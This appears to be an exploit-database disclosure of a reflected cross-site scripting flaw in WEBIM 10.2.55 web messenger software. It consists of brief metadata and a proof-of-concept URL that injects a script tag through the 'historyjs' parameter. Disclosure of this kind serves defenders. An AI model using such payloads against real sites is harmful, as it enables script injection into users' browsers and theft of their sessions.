WEBIM 10.2.55 Cross Site Scripting

2021.03.10

Credit: AsCiI

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: XSS in WEBIM <http://WEBIM.RU> web application
# Date: 10.08.2021
# Exploit Author: ASCII
# Vendor Homepage: HTTPS://WEBIM.RU
# Version: 10.2.55
# Tested on: 10.2.55
Webim messanger XSS

POC

https://[location].webim.ru/webim/iframe-sample.php?historyjs=1%27"()%26%25<acx><ScRiPt%20>alert(1)</ScRiPt>&location=test&redirected=0&webim-visitor=2&webimVisitor=1

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

WEBIM 10.2.55 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

WEBIM 10.2.55 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.